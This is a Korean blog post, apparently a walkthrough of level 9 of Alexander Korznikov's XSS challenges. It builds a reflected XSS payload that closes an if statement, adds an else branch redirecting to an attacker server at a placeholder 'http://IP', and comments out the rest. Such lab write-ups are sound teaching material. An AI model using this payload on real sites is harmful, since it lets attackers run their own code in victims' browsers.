XSS Challenges 9

한동안 올리지 못했던 XSS 챌린지를 오랜만에 다시 풀게 되었습니다. 제가 재미있게 풀고 있는 Alexander Korznikov의 XSS 챌린지의 장점은 기존의 XSS 게임과는 다르게 파회 법을 올린 사람들이 많이 없으며(국내에서는 본 적이 없네요..) 출제자의 의도를 알아서 파악하고 일말의 힌트 없이 공략 한다는 점에서 더욱 애착이 가고 몰입이 되는 거 같습니다.

 

공략 페이지는 굉장히 심플합니다. Reflected 방식으로 파라미터에 적절한 Payload가 삽입될 경우 다이얼로그 팝업창을 띄우실 수 있습니다.

 

이전 단계(8-1) 의 소스와 유사한 형태의 코드를 가지고 있습니다. b라는 변수에는 "1"이 선언되어 있고 if 조건문을 통해 스크립트가 실행될 수 있도록 구문을 완성시켜야 됩니다.

 

b의 변수가 1로 선언된 시점에서 True 로직에는 관심이 없습니다. 우선 Your_Payload가 들어가는 구문을 우선적으로 닫아주겠습니다.

 

'}else{document.location.href="http://IP"}

else를 선언하여 예외처리일 때 코드가 실행되도록 공격자 서버에 담긴 코드를 로드하도록 document.location.href 을 선언해서 진행해보겠습니다.

 

'}else{document.location.href="http://IP"}//

위의 코드를 삽입해보면. html"} 이후의 구문이 불필요하게 연결되어 있어 올바르게 완성되지 않습니다. 한 줄 주석처리인 "//" 더블 슬러쉬를 이어서 작성해줍니다.

 

최종적으로 작성된 Payload를 php?p=에 담아서 전송해보도록 하겠습니다.

 

최종 구문이 완성되었으니 파라미터에 입력해보면 위와 같이 공격자 서버에 담긴 html로 리다이렉트 되어 다이얼로그 창을 띄우게 됩니다.